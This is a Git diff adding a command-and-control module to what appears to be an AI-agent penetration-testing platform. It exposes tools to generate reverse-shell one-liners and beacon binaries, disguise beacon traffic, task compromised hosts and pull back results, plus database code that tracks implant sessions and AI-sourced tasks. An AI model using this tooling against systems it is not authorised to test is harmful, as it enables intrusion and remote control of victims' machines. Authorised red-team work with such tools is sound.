"enum": []string{"get_result", "wait", "list", "cancel"}}, + "task_id": map[string]interface{}{"type": "string", "description": "任务 ID(get_result/wait/cancel 需要)"}, + "session_id": map[string]interface{}{"type": "string", "description": "按会话过滤(list)"}, + "status": map[string]interface{}{"type": "string", "description": "按状态过滤: queued/sent/running/success/failed/cancelled(list)"}, + "limit": map[string]interface{}{"type": "integer", "description": "返回数量上限(list)"}, + "timeout_seconds": map[string]interface{}{"type": "integer", "description": "等待超时秒数(wait),默认 60"}, + }, + "required": []string{"action"}, + }, + }, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) { + action := getString(params, "action") + + switch action { + case "get_result": + id := getString(params, "task_id") + task, err := m.DB().GetC2Task(id) + if err != nil { + return makeC2Result(nil, err) + } + if task == nil { + return makeC2Result(nil, fmt.Errorf("task not found")) + } + return makeC2Result(map[string]interface{}{"task": task}, nil) + + case "wait": + id := getString(params, "task_id") + timeout := int(getFloat64(params, "timeout_seconds")) + if timeout <= 0 { + timeout = 60 + } + deadline := time.Now().Add(time.Duration(timeout) * time.Second) + for time.Now().Before(deadline) { + task, err := m.DB().GetC2Task(id) + if err != nil { + return makeC2Result(nil, err) + } + if task == nil { + return makeC2Result(nil, fmt.Errorf("task not found")) + } + if task.Status == "success" || task.Status == "failed" || task.Status == "cancelled" { + return makeC2Result(map[string]interface{}{"task": task}, nil) + } + select { + case <-time.After(500 * time.Millisecond): + case <-ctx.Done(): + return makeC2Result(nil, ctx.Err()) + } + } + return makeC2Result(nil, fmt.Errorf("timeout waiting for task completion")) + + case "list": + filter := database.ListC2TasksFilter{ + SessionID: getString(params, "session_id"), + Status: getString(params, "status"), + } + if limit := int(getFloat64(params, "limit")); limit > 0 { + filter.Limit = limit + } + tasks, err := m.DB().ListC2Tasks(filter) + return makeC2Result(map[string]interface{}{"tasks": tasks, "count": len(tasks)}, err) + + case "cancel": + id := getString(params, "task_id") + err := m.CancelTask(id) + return makeC2Result(map[string]interface{}{"cancelled": err == nil}, err) + + default: + return makeC2Result(nil, fmt.Errorf("unknown action: %s", action)) + } + }) +} + +// ============================================================================ +// c2_payload — Payload 统一工具 +// ============================================================================ + +func registerC2PayloadTool(s *mcp.Server, m *c2.Manager, l *zap.Logger, webListenPort int) { + s.RegisterTool(mcp.Tool{ + Name: builtin.ToolC2Payload, + Description: fmt.Sprintf(`C2 Payload 生成。通过 action 参数选择操作: +- oneliner: 生成单行 payload。kind 必须与监听器协议一致,否则会失败: + • tcp_reverse:裸 TCP 反弹,可用 kind: bash, nc, nc_mkfifo, python, perl, powershell(bash 指 /dev/tcp 类,不是 HTTP)。 + • http_beacon / https_beacon / websocket:仅 HTTP(S) Beacon 轮询,oneliner 只能用 kind: curl_beacon(脚本内用 bash+curl,与「tcp 的 bash」不同)。curl_beacon 返回串末尾含「 &」用于把整个 bash -c 放后台;若用 exec/execute 同步执行,必须整段原样复制(含末尾 &)。若删掉 &,内部 while 死循环占满前台,调用会一直阻塞到超时/杀进程。 + • 需要经典 bash 反弹 shell 时:先 c2_listener create type=tcp_reverse,再对该监听器用 kind=bash。 + • 省略 kind 时,会按监听器类型自动选第一个兼容类型(HTTP 系默认为 curl_beacon)。 +- build: 交叉编译 beacon 二进制。支持 http_beacon / https_beacon / websocket / tcp_reverse(tcp_reverse 下植入端回连后先发魔数 CSB1,再走与 HTTP 相同的 AES-GCM JSON 语义;未发魔数的连接仍按经典交互 shell 处理)。 +依赖的监听器 bind_port 须避开本服务 Web 端口 %d(配置 server.port,与 c2_listener 描述一致),否则 Beacon 无法正确回连。`, webListenPort), + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "action": map[string]interface{}{"type": "string", "description": "操作: oneliner/build", "enum": []string{"oneliner", "build"}}, + "listener_id": map[string]interface{}{"type": "string", "description": "监听器 ID(必填)。oneliner 前请确认该监听器的 type,再选兼容的 kind"}, + "kind": map[string]interface{}{"type": "string", "description": "仅 action=oneliner 需要。tcp_reverse: bash|nc|nc_mkfifo|python|perl|powershell;http_beacon|https_beacon|websocket: 仅 curl_beacon"}, + "host": map[string]interface{}{"type": "string", "description": "oneliner/build 可选覆盖:非空则强制用作植入回连主机。留空时顺序为:监听器 callback_host(create/update 的 callback_host 参数写入)→ bind_host(0.0.0.0 时尝试本机对外 IP 探测)"}, + "os": map[string]interface{}{"type": "string", "description": "目标 OS(build): linux/windows/darwin", "default": "linux"}, + "arch": map[string]interface{}{"type": "string", "description": "目标架构(build): amd64/arm64/386/arm", "default": "amd64"}, + "sleep_seconds": map[string]interface{}{"type": "integer", "description": "默认心跳间隔(build)"}, + "jitter_percent": map[string]interface{}{"type": "integer", "description": "默认抖动百分比(build)"}, + }, + "required": []string{"action", "listener_id"}, + }, + }, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) { + action := getString(params, "action") + listenerID := getString(params, "listener_id") + + switch action { + case "oneliner": + listener, err := m.DB().GetC2Listener(listenerID) + if err != nil { + return makeC2Result(nil, err) + } + if listener == nil { + return makeC2Result(nil, fmt.Errorf("listener not found")) + } + host := c2.ResolveBeaconDialHost(listener, getString(params, "host"), l, listenerID) + kind := c2.OnelinerKind(getString(params, "kind")) + if kind == "" { + compatible := c2.OnelinerKindsForListener(listener.Type) + if len(compatible) > 0 { + kind = compatible[0] + } + } + if !c2.IsOnelinerCompatible(listener.Type, kind) { + compatible := c2.OnelinerKindsForListener(listener.Type) + names := make([]string, len(compatible)) + for i, k := range compatible { + names[i] = string(k) + } + return makeC2Result(nil, fmt.Errorf("监听器类型 %s 不支持 %s,兼容类型: %v", listener.Type, kind, names)) + } + input := c2.OnelinerInput{ + Kind: kind, + Host: host, + Port: listener.BindPort, + HTTPBaseURL: fmt.Sprintf("http://%s:%d", host, listener.BindPort), + ImplantToken: listener.ImplantToken, + } + oneliner, err := c2.GenerateOneliner(input) + if err != nil { + return makeC2Result(nil, err) + } + out := map[string]interface{}{ + "oneliner": oneliner, "kind": input.Kind, "host": host, "port": listener.BindPort, + } + if kind == c2.OnelinerCurl { + out["usage_note"] = "同步 exec/execute:整段原样执行(末尾须有「 &」)。去掉则 while 永不结束,工具会一直卡住。" + } + return makeC2Result(out, nil) + + case "build": + builder := c2.NewPayloadBuilder(m, l, "", "") + input := c2.PayloadBuilderInput{ + ListenerID: listenerID, + OS: getString(params, "os"), + Arch: getString(params, "arch"), + SleepSeconds: int(getFloat64(params, "sleep_seconds")), + JitterPercent: int(getFloat64(params, "jitter_percent")), + Host: strings.TrimSpace(getString(params, "host")), + } + result, err := builder.BuildBeacon(input) + if err != nil { + return makeC2Result(nil, err) + } + return makeC2Result(map[string]interface{}{ + "payload_id": result.PayloadID, "download_path": result.DownloadPath, + "os": result.OS, "arch": result.Arch, "size_bytes": result.SizeBytes, + }, nil) + + default: + return makeC2Result(nil, fmt.Errorf("unknown action: %s", action)) + } + }) +} + +// ============================================================================ +// c2_event — 事件查询工具 +// ============================================================================ + +func registerC2EventTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) { + s.RegisterTool(mcp.Tool{ + Name: builtin.ToolC2Event, + Description: "获取 C2 事件(上线/掉线/任务/错误),支持按级别/类别/会话/任务/时间过滤", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "level": map[string]interface{}{"type": "string", "description": "级别过滤: info/warn/critical"}, + "category": map[string]interface{}{"type": "string", "description": "类别过滤: listener/session/task/payload/opsec"}, + "session_id": map[string]interface{}{"type": "string", "description": "按会话过滤"}, + "task_id": map[string]interface{}{"type": "string", "description": "按任务过滤"}, + "since": map[string]interface{}{"type": "string", "description": "起始时间(RFC3339 格式,如 2025-01-01T00:00:00Z)"}, + "limit": map[string]interface{}{"type": "integer", "default": 50, "description": "返回数量"}, + }, + }, + }, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) { + filter := database.ListC2EventsFilter{ + Level: getString(params, "level"), + Category: getString(params, "category"), + SessionID: getString(params, "session_id"), + TaskID: getString(params, "task_id"), + Limit: int(getFloat64(params, "limit")), + } + if filter.Limit <= 0 { + filter.Limit = 50 + } + if since := getString(params, "since"); since != "" { + if t, err := time.Parse(time.RFC3339, since); err == nil { + filter.Since = &t + } + } + events, err := m.DB().ListC2Events(filter) + return makeC2Result(map[string]interface{}{"events": events, "count": len(events)}, err) + }) +} + +// ============================================================================ +// c2_profile — Malleable Profile 管理工具(新增) +// ============================================================================ + +func registerC2ProfileTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) { + s.RegisterTool(mcp.Tool{ + Name: builtin.ToolC2Profile, + Description: `C2 Malleable Profile 管理(控制 beacon 通信伪装)。通过 action 参数选择操作: +- list: 列出所有 Profile +- get: 获取 Profile 详情(需 profile_id) +- create: 创建 Profile(需 name,可选 user_agent/uris/request_headers/response_headers/body_template/jitter_min_ms/jitter_max_ms) +- update: 更新 Profile(需 profile_id) +- delete: 删除 Profile(需 profile_id)`, + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "action": map[string]interface{}{"type": "string", "description": "操作: list/get/create/update/delete", "enum": []string{"list", "get", "create", "update", "delete"}}, + "profile_id": map[string]interface{}{"type": "string", "description": "Profile ID(get/update/delete 需要)"}, + "name": map[string]interface{}{"type": "string", "description": "Profile 名称"}, + "user_agent": map[string]interface{}{"type": "string", "description": "User-Agent 字符串"}, + "uris": map[string]interface{}{"type": "array", "items": map[string]interface{}{"type": "string"}, "description": "beacon 请求的 URI 列表"}, + "request_headers": map[string]interface{}{"type": "object", "description": "自定义请求头"}, + "response_headers": map[string]interface{}{"type": "object", "description": "自定义响应头"}, + "body_template": map[string]interface{}{"type": "string", "description": "响应体模板"}, + "jitter_min_ms": map[string]interface{}{"type": "integer", "description": "最小抖动(毫秒)"}, + "jitter_max_ms": map[string]interface{}{"type": "integer", "description": "最大抖动(毫秒)"}, + }, + "required": []string{"action"}, + }, + }, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) { + action := getString(params, "action") + id := getString(params, "profile_id") + + switch action { + case "list": + profiles, err := m.DB().ListC2Profiles() + return makeC2Result(map[string]interface{}{"profiles": profiles, "count": len(profiles)}, err) + + case "get": + profile, err := m.DB().GetC2Profile(id) + if err != nil { + return makeC2Result(nil, err) + } + if profile == nil { + return makeC2Result(nil, fmt.Errorf("profile not found")) + } + return makeC2Result(map[string]interface{}{"profile": profile}, nil) + + case "create": + profile := &database.C2Profile{ + ID: "p_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14], + Name: getString(params, "name"), + UserAgent: getString(params, "user_agent"), + BodyTemplate: getString(params, "body_template"), + JitterMinMS: int(getFloat64(params, "jitter_min_ms")), + JitterMaxMS: int(getFloat64(params, "jitter_max_ms")), + CreatedAt: time.Now(), + } + if uris, ok := params["uris"]; ok { + if arr, ok := uris.([]interface{}); ok { + for _, u := range arr { + if s, ok := u.(string); ok { + profile.URIs = append(profile.URIs, s) + } + } + } + } + if rh, ok := params["request_headers"]; ok { + if m, ok := rh.(map[string]interface{}); ok { + profile.RequestHeaders = make(map[string]string) + for k, v := range m { + profile.RequestHeaders[k], _ = v.(string) + } + } + } + if rh, ok := params["response_headers"]; ok { + if m, ok := rh.(map[string]interface{}); ok { + profile.ResponseHeaders = make(map[string]string) + for k, v := range m { + profile.ResponseHeaders[k], _ = v.(string) + } + } + } + if err := m.DB().CreateC2Profile(profile); err != nil { + return makeC2Result(nil, err) + } + return makeC2Result(map[string]interface{}{"profile": profile}, nil) + + case "update": + profile, err := m.DB().GetC2Profile(id) + if err != nil { + return makeC2Result(nil, err) + } + if profile == nil { + return makeC2Result(nil, fmt.Errorf("profile not found")) + } + if v := getString(params, "name"); v != "" { + profile.Name = v + } + if v := getString(params, "user_agent"); v != "" { + profile.UserAgent = v + } + if v := getString(params, "body_template"); v != "" { + profile.BodyTemplate = v + } + if v := int(getFloat64(params, "jitter_min_ms")); v > 0 { + profile.JitterMinMS = v + } + if v := int(getFloat64(params, "jitter_max_ms")); v > 0 { + profile.JitterMaxMS = v + } + if uris, ok := params["uris"]; ok { + if arr, ok := uris.([]interface{}); ok { + profile.URIs = nil + for _, u := range arr { + if s, ok := u.(string); ok { + profile.URIs = append(profile.URIs, s) + } + } + } + } + if rh, ok := params["request_headers"]; ok { + if mp, ok := rh.(map[string]interface{}); ok { + profile.RequestHeaders = make(map[string]string) + for k, v := range mp { + profile.RequestHeaders[k], _ = v.(string) + } + } + } + if rh, ok := params["response_headers"]; ok { + if mp, ok := rh.(map[string]interface{}); ok { + profile.ResponseHeaders = make(map[string]string) + for k, v := range mp { + profile.ResponseHeaders[k], _ = v.(string) + } + } + } + if err := m.DB().UpdateC2Profile(profile); err != nil { + return makeC2Result(nil, err) + } + return makeC2Result(map[string]interface{}{"profile": profile}, nil) + + case "delete": + err := m.DB().DeleteC2Profile(id) + return makeC2Result(map[string]interface{}{"deleted": err == nil}, err) + + default: + return makeC2Result(nil, fmt.Errorf("unknown action: %s", action)) + } + }) +} + +// ============================================================================ +// c2_file — 文件管理工具(新增) +// ============================================================================ + +func registerC2FileTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) { + s.RegisterTool(mcp.Tool{ + Name: builtin.ToolC2File, + Description: `C2 文件管理。通过 action 参数选择操作: +- list: 列出会话的文件传输记录(需 session_id) +- get_result: 获取任务结果文件路径(截图等,需 task_id)`, + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "action": map[string]interface{}{"type": "string", "description": "操作: list/get_result", "enum": []string{"list", "get_result"}}, + "session_id": map[string]interface{}{"type": "string", "description": "会话 ID(list 需要)"}, + "task_id": map[string]interface{}{"type": "string", "description": "任务 ID(get_result 需要)"}, + }, + "required": []string{"action"}, + }, + }, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) { + action := getString(params, "action") + + switch action { + case "list": + sessionID := getString(params, "session_id") + if sessionID == "" { + return makeC2Result(nil, fmt.Errorf("session_id required")) + } + files, err := m.DB().ListC2FilesBySession(sessionID) + return makeC2Result(map[string]interface{}{"files": files, "count": len(files)}, err) + + case "get_result": + taskID := getString(params, "task_id") + task, err := m.DB().GetC2Task(taskID) + if err != nil { + return makeC2Result(nil, err) + } + if task == nil { + return makeC2Result(nil, fmt.Errorf("task not found")) + } + if task.ResultBlobPath == "" { + return makeC2Result(map[string]interface{}{"has_file": false, "task_id": taskID}, nil) + } + return makeC2Result(map[string]interface{}{ + "has_file": true, + "task_id": taskID, + "file_path": task.ResultBlobPath, + }, nil) + + default: + return makeC2Result(nil, fmt.Errorf("unknown action: %s", action)) + } + }) +} + +// ============================================================================ +// 工具函数 +// ============================================================================ + +func getString(params map[string]interface{}, key string) string { + if v, ok := params[key]; ok { + if s, ok := v.(string); ok { + return s + } + } + return "" +} + +func getFloat64(params map[string]interface{}, key string) float64 { + if v, ok := params[key]; ok { + switch n := v.(type) { + case float64: + return n + case int: + return float64(n) + case string: + if f, err := strconv.ParseFloat(n, 64); err == nil { + return f + } + } + } + return 0 +} diff --git a/internal/database/c2.go b/internal/database/c2.go new file mode 100644 index 00000000..0965ba3d --- /dev/null +++ b/internal/database/c2.go @@ -0,0 +1,1259 @@ +package database + +import ( + "database/sql" + "encoding/json" + "errors" + "fmt" + "strings" + "time" + + "go.uber.org/zap" +) + +// ErrNoValidC2EventIDs 批量删除事件时未提供任何合法 ID +var ErrNoValidC2EventIDs = errors.New("no valid event ids") + +// ErrNoValidC2TaskIDs 批量删除任务时未提供任何合法 ID +var ErrNoValidC2TaskIDs = errors.New("no valid task ids") + +// validC2TextIDForDelete 校验 C2 文本主键(e_/t_/s_/… 等)用于批量删除入参 +func validC2TextIDForDelete(id string) bool { + if len(id) < 2 || len(id) > 80 { + return false + } + for _, c := range id { + if (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9') || c == '_' { + continue + } + return false + } + return true +} + +// ============================================================================ +// C2 模块数据模型 — 6 张表的领域类型 +// 设计要点: +// - 全部使用文本主键(l_/s_/t_/f_/e_/p_ 前缀),与项目现有 ws_/v_ 风格一致; +// - 时间字段统一 time.Time,由 SQLite 自动序列化为 ISO8601; +// - 大字段(profile 配置、心跳元数据、任务结果)走 JSON 文本,避免频繁加列; +// - 任意会话/任务/文件均可按 listener_id / session_id 级联删除(FOREIGN KEY ON DELETE CASCADE)。 +// ============================================================================ + +// C2Listener 监听器实体 +type C2Listener struct { + ID string `json:"id"` + Name string `json:"name"` + Type string `json:"type"` // tcp_reverse|http_beacon|https_beacon|websocket|dns + BindHost string `json:"bindHost"` // 默认 127.0.0.1 + BindPort int `json:"bindPort"` // 1-65535 + ProfileID string `json:"profileId"` // 可空:关联 c2_profiles.id + EncryptionKey string `json:"-"` // base64(AES-256),前端不返回 + ImplantToken string `json:"-"` // beacon 携带的鉴权 token,前端不返回 + Status string `json:"status"` // stopped|running|error + ConfigJSON string `json:"configJson"` // TLS 证书路径 / URI 模式 / 上限并发 等 + Remark string `json:"remark"` + CreatedAt time.Time `json:"createdAt"` + StartedAt *time.Time `json:"startedAt,omitempty"` + LastError string `json:"lastError,omitempty"` +} + +// C2Session 已上线会话 +type C2Session struct { + ID string `json:"id"` + ListenerID string `json:"listenerId"` + ImplantUUID string `json:"implantUuid"` + Hostname string `json:"hostname"` + Username string `json:"username"` + OS string `json:"os"` + Arch string `json:"arch"` + PID int `json:"pid"` + ProcessName string `json:"processName"` + IsAdmin bool `json:"isAdmin"` + InternalIP string `json:"internalIp"` + ExternalIP string `json:"externalIp"` + UserAgent string `json:"userAgent"` + SleepSeconds int `json:"sleepSeconds"` + JitterPercent int `json:"jitterPercent"` + Status string `json:"status"` // active|sleeping|dead|killed + FirstSeenAt time.Time `json:"firstSeenAt"` + LastCheckIn time.Time `json:"lastCheckIn"` + Metadata map[string]interface{} `json:"metadata,omitempty"` + Note string `json:"note"` +} + +// C2Task 下发任务 +type C2Task struct { + ID string `json:"id"` + SessionID string `json:"sessionId"` + TaskType string `json:"taskType"` + Payload map[string]interface{} `json:"payload,omitempty"` + Status string `json:"status"` // queued|sent|running|success|failed|cancelled + ResultText string `json:"resultText,omitempty"` + ResultBlobPath string `json:"resultBlobPath,omitempty"` + Error string `json:"error,omitempty"` + Source string `json:"source"` // manual|ai|batch|api + ConversationID string `json:"conversationId,omitempty"` + ApprovalStatus string `json:"approvalStatus,omitempty"` // pending|approved|rejected + CreatedAt time.Time `json:"createdAt"` + SentAt *time.Time `json:"sentAt,omitempty"` + StartedAt *time.Time `json:"startedAt,omitempty"` + CompletedAt *time.Time `json:"completedAt,omitempty"` + DurationMS int64 `json:"durationMs,omitempty"` +} + +// C2File 上传/下载凭证 +type C2File struct { + ID string `json:"id"` + SessionID string `json:"sessionId"` + TaskID string `json:"taskId"` + Direction string `json:"direction"` // upload|download + RemotePath string `json:"remotePath"` + LocalPath string `json:"localPath"` + SizeBytes int64 `json:"sizeBytes"` + SHA256 string `json:"sha256"` + CreatedAt time.Time `json:"createdAt"` +} + +// C2Event 事件审计 +type C2Event struct { + ID string `json:"id"` + Level string `json:"level"` // info|warn|critical + Category string `json:"category"` // listener|session|task|payload|opsec + SessionID string `json:"sessionId,omitempty"` + TaskID string `json:"taskId,omitempty"` + Message string `json:"message"` + Data map[string]interface{} `json:"data,omitempty"` + CreatedAt time.Time `json:"createdAt"` +} + +// C2Profile Malleable Profile +type C2Profile struct { + ID string `json:"id"` + Name string `json:"name"` + UserAgent string `json:"userAgent"` + URIs []string `json:"uris"` + RequestHeaders map[string]string `json:"requestHeaders,omitempty"` + ResponseHeaders map[string]string `json:"responseHeaders,omitempty"` + BodyTemplate string `json:"bodyTemplate"` + JitterMinMS int `json:"jitterMinMs"` + JitterMaxMS int `json:"jitterMaxMs"` + Extra map[string]interface{} `json:"extra,omitempty"` + CreatedAt time.Time `json:"createdAt"` +} + +// ---------------------------------------------------------------------------- +// CRUD:C2 监听器 +// ---------------------------------------------------------------------------- + +// CreateC2Listener 写入新监听器;ID/Name 由调用方生成校验 +func (db *DB) CreateC2Listener(l *C2Listener) error { + if l == nil || strings.TrimSpace(l.ID) == "" { + return errors.New("listener id is required") + } + if l.CreatedAt.IsZero() { + l.CreatedAt = time.Now() + } + if strings.TrimSpace(l.Status) == "" { + l.Status = "stopped" + } + if strings.TrimSpace(l.ConfigJSON) == "" { + l.ConfigJSON = "{}" + } + query := ` + INSERT INTO c2_listeners (id, name, type, bind_host, bind_port, profile_id, encryption_key, + implant_token, status, config_json, remark, created_at, started_at, last_error) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) + ` + _, err := db.Exec(query, + l.ID, l.Name, l.Type, l.BindHost, l.BindPort, l.ProfileID, l.EncryptionKey, + l.ImplantToken, l.Status, l.ConfigJSON, l.Remark, l.CreatedAt, l.StartedAt, l.LastError, + ) + if err != nil { + db.logger.Error("创建 C2 监听器失败", zap.Error(err), zap.String("id", l.ID)) + return err + } + return nil +} + +// UpdateC2Listener 更新监听器;空字段也会被覆盖(请先 GetC2Listener 拿到完整对象再改) +func (db *DB) UpdateC2Listener(l *C2Listener) error { + if l == nil || strings.TrimSpace(l.ID) == "" { + return errors.New("listener id is required") + } + if strings.TrimSpace(l.ConfigJSON) == "" { + l.ConfigJSON = "{}" + } + query := ` + UPDATE c2_listeners SET + name = ?, type = ?, bind_host = ?, bind_port = ?, profile_id = ?, encryption_key = ?, + implant_token = ?, status = ?, config_json = ?, remark = ?, started_at = ?, last_error = ? + WHERE id = ? + ` + res, err := db.Exec(query, + l.Name, l.Type, l.BindHost, l.BindPort, l.ProfileID, l.EncryptionKey, + l.ImplantToken, l.Status, l.ConfigJSON, l.Remark, l.StartedAt, l.LastError, l.ID, + ) + if err != nil { + db.logger.Error("更新 C2 监听器失败", zap.Error(err), zap.String("id", l.ID)) + return err + } + affected, _ := res.RowsAffected() + if affected == 0 { + return sql.ErrNoRows + } + return nil +} + +// SetC2ListenerStatus 仅更新状态/started_at/last_error 三个字段,避免与全量更新竞争 +func (db *DB) SetC2ListenerStatus(id, status, lastError string, startedAt *time.Time) error { + query := ` + UPDATE c2_listeners SET status = ?, last_error = ?, started_at = COALESCE(?, started_at) + WHERE id = ? + ` + res, err := db.Exec(query, status, lastError, startedAt, id) + if err != nil { + return err + } + affected, _ := res.RowsAffected() + if affected == 0 { + return sql.ErrNoRows + } + return nil +} + +// GetC2Listener 单条查询 +func (db *DB) GetC2Listener(id string) (*C2Listener, error) { + query := ` + SELECT id, name, type, bind_host, bind_port, COALESCE(profile_id, ''), + COALESCE(encryption_key, ''), COALESCE(implant_token, ''), status, + COALESCE(config_json, '{}'), COALESCE(remark, ''), + created_at, started_at, COALESCE(last_error, '') + FROM c2_listeners WHERE id = ? + ` + var l C2Listener + var startedAt sql.NullTime + err := db.QueryRow(query, id).Scan( + &l.ID, &l.Name, &l.Type, &l.BindHost, &l.BindPort, &l.ProfileID, + &l.EncryptionKey, &l.ImplantToken, &l.Status, + &l.ConfigJSON, &l.Remark, + &l.CreatedAt, &startedAt, &l.LastError, + ) + if err == sql.ErrNoRows { + return nil, nil + } + if err != nil { + return nil, err + } + if startedAt.Valid { + t := startedAt.Time + l.StartedAt = &t + } + return &l, nil +} + +// ListC2Listeners 全量列表,按创建时间倒序 +func (db *DB) ListC2Listeners() ([]*C2Listener, error) { + query := ` + SELECT id, name, type, bind_host, bind_port, COALESCE(profile_id, ''), + COALESCE(encryption_key, ''), COALESCE(implant_token, ''), status, + COALESCE(config_json, '{}'), COALESCE(remark, ''), + created_at, started_at, COALESCE(last_error, '') + FROM c2_listeners ORDER BY created_at DESC + ` + rows, err := db.Query(query) + if err != nil { + return nil, err + } + defer rows.Close() + var list []*C2Listener + for rows.Next() { + var l C2Listener + var startedAt sql.NullTime + if err := rows.Scan( + &l.ID, &l.Name, &l.Type, &l.BindHost, &l.BindPort, &l.ProfileID, + &l.EncryptionKey, &l.ImplantToken, &l.Status, + &l.ConfigJSON, &l.Remark, + &l.CreatedAt, &startedAt, &l.LastError, + ); err != nil { + db.logger.Warn("扫描 c2_listeners 行失败", zap.Error(err)) + continue + } + if startedAt.Valid { + t := startedAt.Time + l.StartedAt = &t + } + list = append(list, &l) + } + return list, rows.Err() +} + +// DeleteC2Listener 级联删除(会话/任务/文件/事件随之消失) +func (db *DB) DeleteC2Listener(id string) error { + res, err := db.Exec(`DELETE FROM c2_listeners WHERE id = ?`, id) + if err != nil { + return err + } + affected, _ := res.RowsAffected() + if affected == 0 { + return sql.ErrNoRows + } + return nil +} + +// ---------------------------------------------------------------------------- +// CRUD:C2 会话 +// ---------------------------------------------------------------------------- + +// UpsertC2Session 按 implant_uuid 唯一约束:首次插入 / 已存在则更新心跳和状态 +func (db *DB) UpsertC2Session(s *C2Session) error { + if s == nil || strings.TrimSpace(s.ID) == "" || strings.TrimSpace(s.ImplantUUID) == "" { + return errors.New("session id and implant_uuid are required") + } + if s.FirstSeenAt.IsZero() { + s.FirstSeenAt = time.Now() + } + if s.LastCheckIn.IsZero() { + s.LastCheckIn = s.FirstSeenAt + } + if strings.TrimSpace(s.Status) == "" { + s.Status = "active" + } + metadataJSON := "{}" + if len(s.Metadata) > 0 { + if b, err := json.Marshal(s.Metadata); err == nil { + metadataJSON = string(b) + } + } + query := ` + INSERT INTO c2_sessions (id, listener_id, implant_uuid, hostname, username, os, arch, + pid, process_name, is_admin, internal_ip, external_ip, user_agent, + sleep_seconds, jitter_percent, status, first_seen_at, last_check_in, + metadata_json, note) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) + ON CONFLICT(implant_uuid) DO UPDATE SET + hostname = excluded.hostname, + username = excluded.username, + os = excluded.os, + arch = excluded.arch, + pid = excluded.pid, + process_name = excluded.process_name, + is_admin = excluded.is_admin, + internal_ip = excluded.internal_ip, + external_ip = excluded.external_ip, + user_agent = excluded.user_agent, + sleep_seconds = excluded.sleep_seconds, + jitter_percent = excluded.jitter_percent, + status = excluded.status, + last_check_in = excluded.last_check_in, + metadata_json = excluded.metadata_json + ` + isAdminInt := 0 + if s.IsAdmin { + isAdminInt = 1 + } + _, err := db.Exec(query, + s.ID, s.ListenerID, s.ImplantUUID, s.Hostname, s.Username, s.OS, s.Arch, + s.PID, s.ProcessName, isAdminInt, s.InternalIP, s.ExternalIP, s.UserAgent, + s.SleepSeconds, s.JitterPercent, s.Status, s.FirstSeenAt, s.LastCheckIn, + metadataJSON, s.Note, + ) + if err != nil { + db.logger.Error("upsert C2 会话失败", zap.Error(err), zap.String("implant_uuid", s.ImplantUUID)) + return err + } + return nil +} + +// TouchC2Session 仅更新 last_check_in / status,性能比 UpsertC2Session 高,给 beacon 高频心跳用 +func (db *DB) TouchC2Session(id, status string, t time.Time) error { + if t.IsZero() { + t = time.Now() + } + res, err := db.Exec(`UPDATE c2_sessions SET last_check_in = ?, status = ? WHERE id = ?`, t, status, id) + if err != nil { + return err + } + affected, _ := res.RowsAffected() + if affected == 0 { + return sql.ErrNoRows + } + return nil +} + +// SetC2SessionStatus 单独改状态 +func (db *DB) SetC2SessionStatus(id, status string) error { + res, err := db.Exec(`UPDATE c2_sessions SET status = ? WHERE id = ?`, status, id) + if err != nil { + return err + } + affected, _ := res.RowsAffected() + if affected == 0 { + return sql.ErrNoRows + } + return nil +} + +// SetC2SessionSleep 改 sleep / jitter(操作员或 AI 主动调整心跳节律) +func (db *DB) SetC2SessionSleep(id string, sleepSeconds, jitterPercent int) error { + if sleepSeconds < 0 { + sleepSeconds = 0 + } + if jitterPercent < 0 { + jitterPercent = 0 + } + if jitterPercent > 100 { + jitterPercent = 100 + } + res, err := db.Exec(`UPDATE c2_sessions SET sleep_seconds = ?, jitter_percent = ? WHERE id = ?`, + sleepSeconds, jitterPercent, id) + if err != nil { + return err + } + affected, _ := res.RowsAffected() + if affected == 0 { + return sql.ErrNoRows + } + return nil +} + +// SetC2SessionNote 改备注 +func (db *DB) SetC2SessionNote(id, note string) error { + _, err := db.Exec(`UPDATE c2_sessions SET note = ? WHERE id = ?`, note, id) + return err +} + +// GetC2Session 按内部 ID 查 +func (db *DB) GetC2Session(id string) (*C2Session, error) { + return db.queryC2SessionWhere(`id = ?`, id) +} + +// GetC2SessionByImplantUUID 按 implant 自报的 UUID 查(重连必需) +func (db *DB) GetC2SessionByImplantUUID(uuid string) (*C2Session, error) { + return db.queryC2SessionWhere(`implant_uuid = ?`, uuid) +} + +func (db *DB) queryC2SessionWhere(whereClause string, args ...interface{}) (*C2Session, error) { + query := ` + SELECT id, listener_id, implant_uuid, COALESCE(hostname,''), COALESCE(username,''), + COALESCE(os,''), COALESCE(arch,''), COALESCE(pid, 0), COALESCE(process_name,''), + COALESCE(is_admin, 0), COALESCE(internal_ip,''), COALESCE(external_ip,''), + COALESCE(user_agent,''), COALESCE(sleep_seconds, 5), COALESCE(jitter_percent, 0), + status, first_seen_at, last_check_in, COALESCE(metadata_json, '{}'), + COALESCE(note, '') + FROM c2_sessions WHERE ` + whereClause + row := db.QueryRow(query, args...) + var s C2Session + var isAdminInt int + var metadataJSON string + err := row.Scan( + &s.ID, &s.ListenerID, &s.ImplantUUID, &s.Hostname, &s.Username, + &s.OS, &s.Arch, &s.PID, &s.ProcessName, + &isAdminInt, &s.InternalIP, &s.ExternalIP, + &s.UserAgent, &s.SleepSeconds, &s.JitterPercent, + &s.Status, &s.FirstSeenAt, &s.LastCheckIn, &metadataJSON, + &s.Note, + ) + if err == sql.ErrNoRows { + return nil, nil + } + if err != nil { + return nil, err + } + s.IsAdmin = isAdminInt != 0 + if metadataJSON != "" && metadataJSON != "{}" { + _ = json.Unmarshal([]byte(metadataJSON), &s.Metadata) + } + return 